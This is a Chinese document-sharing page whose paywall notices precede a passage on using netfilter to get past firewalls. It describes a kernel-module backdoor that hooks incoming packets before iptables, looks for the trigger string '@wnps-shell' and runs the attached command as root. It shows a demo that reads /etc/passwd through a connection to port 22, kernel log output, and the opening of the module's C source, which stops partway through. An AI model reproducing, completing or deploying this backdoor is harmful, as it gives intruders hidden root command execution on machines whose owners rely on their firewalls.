利用netfilter来突破防火墙.docVIP

下载本文档

1
0
约5.06千字
约 17页
2017-06-12 发布于河南
举报
版权申诉

利用netfilter来突破防火墙.doc

1、原创力文档（book118）网站文档一经付费（服务费），不意味着购买了该文档的版权，仅供个人/单位学习、研究之用，不得用于商业用途，未经授权，严禁复制、发行、汇编、翻译或者网络传播等，侵权必究。。
2、本站所有内容均由合作方或网友上传，本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺！文档内容仅供研究参考，付费前请自行鉴别。如您付费，意味着您自己接受本站规则且自行承担风险，本站不退款、不进行额外附加服务；查看《如何避免下载的几个坑》。如果您已付费下载过本站文档，您可以点击这里二次下载。
3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等，请点击“版权申诉”（推荐），也可以打举报电话：400-050-0827(电话支持时间：9:00-18:30)。
4、该文档为VIP文档，如果想要下载，成为VIP会员后，下载免费。
5、成为VIP后，下载本文档将扣除1次下载权益。下载后，不支持退款、换文档。如有疑问请联系我们。
6、成为VIP后，您将拥有八大权益，权益包括：VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
7、VIP文档为合作方或网友上传，每下载1次，网站将根据用户上传文档的质量评分、类型等，对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档

利用netfilter来突破防火墙

利用netfilter来突破防火墙前几天看了rwrk这个rk的demo, 它就是利用netfilter hook住了进入主机的数据包， hook点是NF_IP_PRE_ROUTING，因此可以在进入iptables之前提前实现数据包的过滤。在这个hook点上作文章就比较多了，可以实现防火墙，嗅探器，当然也可以用来触发回连后门， wnps就是这么来作的，因此不管主机防火墙作的规则如何变态，都有机会穿透它。下面这个demo用来演示分析tcp包的内容，分析出里面的命令，然后去执行它，有点类似以前的icmp, ip包后门，只不过这些都在内核来完成，功能更强大。 demo在ubuntu8.10 + 2.6.28上测试成功。 wzt@wzt-laptop:~$ nc -vv localhost 22 localhost [127.0.0.1] 22 (ssh) open SSH-2.0-OpenSSH_5.1p1 Debian-3ubuntu1 @wnps-shell:cat /etc/passwd /home/wzt/pass.log Protocol mismatch. sent 49, rcvd 58 demsg: [ 957.255416] kexec test start ... [ 1029.692964] hook: function:hook_func-L125: got the tcp key . [ 1029.692981] hook: function:hook_func-L127: cat /etc/passwd /home/wzt/pass.log [ 1029.692985] wzt@wzt-laptop:~$ ls -lht pass.log -rw-r--r-- 1 root root 1.7K 2009-06-04 08:08 pass.log +---------------------------------------------------------------------+ #include linux/kernel.h #include linux/init.h #include linux/module.h #include linux/version.h #include linux/string.h #include linux/kmod.h #include linux/vmalloc.h #include linux/workqueue.h #include linux/spinlock.h #include linux/socket.h #include linux/net.h #include linux/in.h #include linux/skbuff.h #include linux/ip.h #include linux/tcp.h #include linux/netfilter.h #include linux/netfilter_ipv4.h #include linux/icmp.h #include net/sock.h #include asm/uaccess.h #include asm/unistd.h #define HOOK_DEBUG #ifdef HOOK_DEBUG #define DbgPrint(format, args...) \ printk(hook: function:%s-L%d: format, __FUNCTION__, __LINE__, ##args); #else #define DbgPrint(format, args...) do {} while(0); #endif #define TCP_SHELL_KEY @wnps-shell #define PORT_NUM 6 #define IP_NUM 20 #define BUFF_NUM 512 MODULE_LICENSE(GPL); MODULE_AUTHOR(wzt); struct exec_work { struct work_struct work; char *cmd; }; static struct nf_hook_ops nfho; int kexec_user_app(void *data) { struct exec_work *work = data; int ret; char *argv[] = {/bin/sh, -c, work-cmd, NULL};